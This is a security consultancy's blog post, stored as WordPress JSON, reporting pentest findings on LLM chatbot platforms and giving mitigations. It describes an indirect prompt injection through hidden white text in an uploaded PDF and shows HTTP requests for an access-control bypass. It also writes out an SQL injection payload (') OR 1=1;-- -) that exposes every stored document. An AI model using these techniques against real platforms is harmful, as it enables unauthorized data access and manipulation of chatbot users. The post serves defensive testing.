{"id":63165,"date":"2026-01-09T13:13:51","date_gmt":"2026-01-09T12:13:51","guid":{"rendered":"https:\/\/www.usd.de\/?p=63165"},"modified":"2026-01-09T13:13:53","modified_gmt":"2026-01-09T12:13:53","slug":"ai-chatbots-pentests-vulnerabilites-llm-platforms","status":"publish","type":"post","link":"https:\/\/www.usd.de\/en\/ai-chatbots-pentests-vulnerabilites-llm-platforms\/","title":{"rendered":"Assessing the Security of AI Chatbots: Pentests Uncover Critical Vulnerabilities in LLM Platforms"},"content":{"rendered":"\n<p><a href=\"https:\/\/www.usd.de\/en\/security-consulting\/ai\/\" data-type=\"link\" data-id=\"https:\/\/www.usd.de\/en\/security-consulting\/ai\/\">Artificial intelligence<\/a> (AI) is transforming the business world. Large language model (LLM) platforms in particular are increasingly finding their way into companies across a wide range of industries. Many are choosing in-house hosted solutions to protect sensitive data and maintain control over their information. This ensures that internal data is not used as training material for public models such as ChatGPT or Gemini.<\/p>\n\n\n\n<p>However, as usage grows, so do security requirements. To meet these requirements, our security analysts at <a href=\"https:\/\/herolab.usd.de\/en\/\" data-type=\"link\" data-id=\"https:\/\/herolab.usd.de\/en\/\" target=\"_blank\" rel=\"noopener\">usd HeroLab<\/a> combine proven methods from <a href=\"https:\/\/www.usd.de\/en\/pentest\/pentest-webapplications\/\" data-type=\"link\" data-id=\"https:\/\/www.usd.de\/en\/pentest\/pentest-webapplications\/\">web application pentesting<\/a> with in-depth expertise in LLM-based platforms. In recent months, they have thoroughly analyzed numerous platforms and identified recurring vulnerabilities.<\/p>\n\n\n\n<p>In this blog post, our colleagues Gerbert Roitburd and Florian Kimmes show which three classes of vulnerabilities they encountered most frequently, what risks these vulnerabilities pose, and explain their impact using real-world findings to illustrate how attackers can exploit them in practice.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Prompt injections are among the most well-known vulnerabilities of LLM platforms<\/h2>\n\n\n\n<p>Prompt injections occur when user input is accepted into the system prompt or retrieval chain without being checked. This allows attackers to manipulate the model's original instructions either by adding to them or overwriting them completely. The result: the model performs actions that are neither intended nor desired. Our analysts regularly encounter this vulnerability in pentests. They were able to successfully demonstrate prompt injections in numerous LLM platforms. The following vulnerability demonstration illustrates the concrete effects of such manipulation:<\/p>\n\n\n\n<p>In a test system, users were allowed to upload documents whose content was then incorporated into the response generation. To demonstrate the vulnerability, our analysts prepared a PDF document with a malicious instruction in white text on a white background. This meant that the instruction was only visible to the LLM, but not to the users. Our PDF file looked like this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.usd.de\/wp-content\/uploads\/Promt-Injection-LLM-1_KI-Chatbot.jpg\"><img loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"369\" src=\"https:\/\/www.usd.de\/wp-content\/uploads\/Promt-Injection-LLM-1_KI-Chatbot.jpg\" alt=\"\" class=\"wp-image-63108\" style=\"width:550px\" \/><\/a><\/figure>\n\n\n\n<p>The text extracted from the PDF was transferred to the system prompt after uploading, thereby overwriting the developer's instruction. As a result, the link actually appeared in the AI chatbot's responses. Injecting a malicious prompt allows attackers to do the following, for example:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Insert phishing links<\/li>\n\n\n\n<li>Bypass security policies<\/li>\n\n\n\n<li>Force liability-relevant or legally binding statements<\/li>\n\n\n\n<li>Unintentionally disclose internal information<\/li>\n\n\n\n<li>Manipulate downstream workflows if responses are processed automatically<\/li>\n<\/ul>\n\n\n\n<p>There is currently no infallible mitigation measure against prompt injections. Prompt injections therefore represent an inherent risk of the underlying technology, as LLMs are by design unable to distinguish between system instructions and user input. Nevertheless, there are a number of techniques that can be used to reduce the likelihood of successful prompt injection attacks or mitigate their effects.<\/p>\n\n\n\n<p><strong>Our analysts recommend: <\/strong>A golden rule when using LLM platforms: The LLM used must never have access to more or higher-privileged resources than the users themselves. In other words, the language model must never serve as an access restriction for functions or information. To reduce the likelihood of a successful attack, the outputs of the LLM can be checked using an additional \u201cguardrail LLM.\u201d User inputs and model outputs are passed to the guardrail LLM, which decides whether a question\/answer pair is malicious in nature.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Broken access control remains the most significant vulnerability in web applications and also affects LLM platforms<\/h2>\n\n\n\n<p>Since 2021, this vulnerability has ranked first in the <a href=\"https:\/\/owasp.org\/www-project-top-ten\/\" data-type=\"link\" data-id=\"https:\/\/owasp.org\/www-project-top-ten\/\" target=\"_blank\" rel=\"noopener\">OWASP Top 10 for web applications<\/a>. our penetration tests confirm that LLM platforms are not exempt from this, as confirmed by the <a href=\"https:\/\/genai.owasp.org\/llm-top-10\/\" data-type=\"link\" data-id=\"https:\/\/genai.owasp.org\/llm-top-10\/\" target=\"_blank\" rel=\"noopener\">OWASP Top 10 for LLM platforms and generative AI<\/a>. Many LLM platforms allow the storage of personal assistants, chat histories, or user-defined system prompts. However, if role and rights checks are incomplete, attackers can access sensitive data.<\/p>\n\n\n\n<p>The cause usually lies in insecurely developed or incorrectly configured authentication and authorization logic. As a result, access to confidential resources is not adequately controlled, sometimes with serious consequences: data can be viewed, modified, or even deleted.<\/p>\n\n\n\n<p>A concrete example from our pentests shows how easy it is to exploit this vulnerability. As regular users, our analysts were able to manipulate other users' chatbots without the appropriate authorization. First, we queried the available models:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"html\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">GET \/v2\/chat\/availableModels HTTP\/2\nHost: example.com\nAuthorization: Bearer ey[REDACTED]\n[...]<\/pre>\n\n\n\n<p>The HTTP response provided exactly two models that a user has access to: Test Model and Default Model, each of which was assigned an ID. Using the ID, which is ascending, additional models could be guessed subsequently. The guessed models could then be modified, for example, users could be added.<\/p>\n\n\n\n<p>The request to edit the model with the ID 134 in order to authorize an additional user can be made as follows:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"24,26\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">POST \/v2\/studio\/skills\/update\/134 HTTP\/2\nHost: example.com\nContent-Length: 532\nSec-Ch-Ua-Platform: \"Linux\"\nAuthorization: Bearer ey[REDACTED]\nContent-Type: application\/json\n[ ... ]\n{\n\"_id\": \"134\",\n\"availability\": {\n\"allUsers\": false,\n\"domain\": \"\",\n\"groups\": [],\n\"onDemand\": false,\n\"users\": [\n\"8a06a98e-be31-46ed-9fa1-44b15dbc7633\"\n]\n},\n\"deployment\": \"gpt-4o-mini\",\n\"description\": \"SampleDescription\",\n\"icon\": \"sms\",\n\"meta\": {\n\"created\": 1740586740.77619,\n\"owner\": \"m-rvwo-ncrw17ty-fdqo96-i75w\",\n\"updated\": 1740587027.443857,\n\"contributors\": [\n\"m-rvwo-ncrw17ty-fdqo96-i75w\"\n]\n},\n\"settings\": {\n\"example\": \"\",\n\"negative\": \"\",\n\"personalization\": false,\n\"positive\": \"\",\"skillContext\": \"\",\n\"knowledge\": null\n},\n\"title\": \"Custom skill1\",\n\"api_keys\": []\n}<\/pre>\n\n\n\n<p>Within the request, the owner and user who should have access to the model were specified. The API accepted the request and issued the following message:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">```\nHTTP\/2 200 OK\nDate: Wed, 26 Feb 2025 16:49:10 GMT\nContent-Type: application\/json\n[ ... ]\n{\"response\":\"Skill updated\",\"result\":true}\nMit dem initialen HTTP-Anfrage k\u00f6nnen wieder die verf\u00fcgbaren Modelle abgefragt werden.\nGET \/v2\/chat\/availableModels HTTP\/2\nHost: example.com\nAuthorization: Bearer ey[REDACTED]\n[...]\n```<\/pre>\n\n\n\n<p>From now on, the model with ID 134 is also accessible to users.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">```\nHTTP\/2 200 OK\nDate: Wed, 26 Feb 2025 16:51:23 GMT\nContent-Type: application\/json\nContent-Length: 329\nAccess-Control-Allow-Credentials: true\n{\n\"response\": [\n{\n\"defaultModel\": false,\n\"description\": \"Test Model\",\n\"icon\": \"sms\",\n\"id\": \"130\",\n\"image\": true,\n\"name\": \"\"\n},\n{\"defaultModel\": true,\n\"description\": \"Default Model\",\n\"icon\": \"sms\",\n\"id\": \"132\",\n\"image\": true,\n\"name\": \"GPT 4o mini\"\n},\n{\n\"defaultModel\": false,\n\"description\": \"SampleDescription\",\n\"icon\": \"sms\",\n\"id\": \"134\",\n\"image\": true,\n\"name\": \"GPT 4o mini\"\n}\n],\n\"result\": true\n}\n```<\/pre>\n\n\n\n<p>Attackers can thus edit all other models within the application. This also applies to models created by other users that contain sensitive information such as documents. These models are then visible and accessible to unauthorized users.<\/p>\n\n\n\n<p><strong>Our analysts recommend:<\/strong> Every action within the web application must be secured by a reliable authorization check. In particular, access to sensitive content and functions must be restricted to authorized users only. Access should be implemented using an access matrix or a global access control mechanism.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:70%\">\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>LLM platforms bring new challenges: Traditional pentesting methods are not sufficient to reliably detect prompt injections and associated risks such as uncontrolled data exfiltration or attacks on downstream components. Many new platforms underestimate these threats. Our pentests show that recurring vulnerabilities in particular can be systematically exploited. Anyone who wants to operate LLMs securely must understand their peculiarities and secure them in a targeted manner.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-small-font-size\"><em>Florian Kimmes, Senior Security Analyst, usd AG<\/em><\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-vertically-aligned-top is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:30%\">\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/www.usd.de\/wp-content\/uploads\/\/Florian-Kimmes-rund-1024x1024.png\" alt=\"\" class=\"wp-image-63142\" style=\"width:160px\" \/><\/figure>\n<\/div>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">SQL Injections in LLM platforms<\/h2>\n\n\n\n<p>LLM platforms also need to store application data and inputs. This includes, for example, the contents of prompts, UUIDs from chats, or even names of created models or users. In practice, relational databases are usually used for this purpose. User inputs often flow directly or indirectly into dynamically composed SQL queries. If these inputs are accepted unfiltered, this creates a vulnerability for SQL injections. Attackers can then manipulate the query by specifically changing parameter values. This allows them to bypass authentication mechanisms, read sensitive information, or modify data records.<\/p>\n\n\n\n<p>Three factors contribute to the frequent occurrence of this vulnerability:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>High complexity of secure input validation<\/li>\n\n\n\n<li>Tight development cycles<\/li>\n\n\n\n<li>Lack of awareness of this vulnerability<\/li>\n<\/ol>\n\n\n\n<p>A practical example from our pentests illustrates the risk: The tested application offered to upload documents and then ask the chatbot about the content of these files. The UUID of the referenced document was transmitted in the document_ids parameter:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">POST \/v1\/api\/ai-service\/doc_qa\/invoke HTTP\/1.1\nHost: internal-api-a.example.com\n[...]\n------WebKitFormBoundarywd29GBhV7ZAJL78A\nContent-Disposition: form-data; name=\"id\"\ndoc_qa\n------WebKitFormBoundarywd29GBhV7ZAJL78A\nContent-Disposition: form-data; name=\"input_data\"\n{\"text\":\"Wie ist das geheime Passwort?\",\"text_fields\":\n{\"document\":\"\"},\"message_history\":[],\"main_prompt\":\"\"}\n------WebKitFormBoundarywd29GBhV7ZAJL78A\nContent-Disposition: form-data; name=\"documents_number\"\n0\n------WebKitFormBoundarywd29GBhV7ZAJL78A\nContent-Disposition: form-data; name=\"document_ids\"\n786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948\n------WebKitFormBoundarywd29GBhV7ZAJL78A--<\/pre>\n\n\n\n<p>The server inserted this value into the following SQL statement without checking it:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"sql\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">SELECT * from documents WHERE cmetadata::json-&gt;&gt; 'doc_id' IN ('786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948');<\/pre>\n\n\n\n<p>Since the document in question did not contain a password, the chatbot's response was accurate: \u201cNo answer found in the document provided.\u201d However, during the pentest, it emerged that document_ids was vulnerable to SQL injection. The following excerpt shows the HTTP request with the SQL injection payload:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"18\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">POST \/v1\/api\/ai-service\/doc_qa\/invoke HTTP\/1.1\nHost: internal-api-a.example.com\n[...]\n------WebKitFormBoundarycpAd0SUogYSB5PG1\nContent-Disposition: form-data; name=\"id\"\ndoc_qa\n------WebKitFormBoundarycpAd0SUogYSB5PG1\nContent-Disposition: form-data; name=\"input_data\"\n{\"text\":\"Wie ist das geheime Passwort?\",\"text_fields\":\n{\"document\":\"\"},\"message_history\":[{\"message_type\":\"human\",\"text\":\"Wie ist\ndas geheime Passwort?\"},{\"message_type\":\"ai\",\"text\":\"Ich habe keine Antwort\nin dem bereitgestellten Dokument gefunden.\",\"image\":null}],\"main_prompt\":\"\"}\n------WebKitFormBoundarycpAd0SUogYSB5PG1\nContent-Disposition: form-data; name=\"documents_number\"\n0\n------WebKitFormBoundarycpAd0SUogYSB5PG1\nContent-Disposition: form-data; name=\"document_ids\"\n786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948') OR 1=1;--\n-\n------WebKitFormBoundarycpAd0SUogYSB5PG1--<\/pre>\n\n\n\n<p>This HTTP request would ensure that the dynamically generated SQL query to the database looks like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"sql\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"false\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">SELECT * from documents WHERE cmetadata::json-&gt;&gt; 'doc_id' IN\n('786bf0b1646ff5ae3b46d83fdb729a53c234b1125ccfc401e8ea7117fe797948') OR\n1=1;-- -);<\/pre>\n\n\n\n<p>The condition 1=1 is always true, meaning that all documents are returned. The AI chatbot was therefore suddenly able to access information stored in completely different files. This would allow attackers to access the contents of all uploaded files.<\/p>\n\n\n\n<p><strong>Our analysts recommend:<\/strong> To avoid this risk, all user input should be treated as potentially malicious and never inserted directly into SQL statements. Instead, parameterized queries (prepared statements) should be used, as they separate data from logic and thus prevent targeted manipulation. In addition, server-side input validation should be implemented to prevent unwanted or incorrect inputs.<\/p>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">What do you need to consider with AI chatbots?<\/h2>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-vertically-aligned-bottom is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:70%\">\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>In addition to securing AI systems, well-known vulnerabilities remain a significant attack vector and therefore continue to be relevant. A web application penetration test can help to identify these vulnerabilities reliably. In addition, we can draw on specialist knowledge of typical vulnerabilities in LLMs and apply this knowledge specifically in our AI projects.<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-small-font-size\"><em>Gerbert Roitburd, Managing Consultant IT Security, usd AG<\/em><\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div class=\"wp-block-column is-vertically-aligned-top is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:30%\">\n<figure class=\"wp-block-image aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/www.usd.de\/wp-content\/uploads\/\/Gerbert-Roitburd-rund-1024x1024.png\" alt=\"\" class=\"wp-image-63145\" style=\"width:160px;height:auto\" \/><\/figure>\n<\/div>\n<\/div>\n\n\n\n<p>Do you want to improve the security of your LLM platform? <a href=\"https:\/\/www.usd.de\/en\/contact-form-analysis-pentests\/\" data-type=\"link\" data-id=\"https:\/\/www.usd.de\/en\/contact-form-analysis-pentests\/\">Contact us<\/a>, we will support you.<\/p>\n\n\n\n<p><a id=\"_msocom_1\"><\/a><\/p>\n\n\n\n<p><a id=\"_msocom_1\"><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Artificial intelligence (AI) is transforming the business world. Large language model (LLM) platforms in particular are increasingly finding their way into companies across a wide range of industries. Many are choosing in-house hosted solutions to protect sensitive data and maintain control over their information. This ensures that internal data is not used as training material [&hellip;]<\/p>\n","protected":false},"author":117,"featured_media":63102,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"off","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"categories":[14846,373,374,10757],"tags":[14452,14938,14457,14935,14936,14939,14937,14940,378,5613,5715,14941,14942],"class_list":["post-63165","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ai","category-news-en","category-pentests-security-analyses-en","category-usd-herolab-en","tag-ai-en","tag-ai-chatbot","tag-ki-en","tag-ki-chatbot","tag-llm","tag-llm-platforms","tag-llm-plattformen","tag-penetration-testing","tag-pentest-en","tag-web-application-2","tag-web-application-pentest","tag-webapplikationen","tag-webapplikationen-pentest"],"_links":{"self":[{"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/posts\/63165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/users\/117"}],"replies":[{"embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/comments?post=63165"}],"version-history":[{"count":5,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/posts\/63165\/revisions"}],"predecessor-version":[{"id":63221,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/posts\/63165\/revisions\/63221"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/media\/63102"}],"wp:attachment":[{"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/media?parent=63165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/categories?post=63165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.usd.de\/en\/wp-json\/wp\/v2\/tags?post=63165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}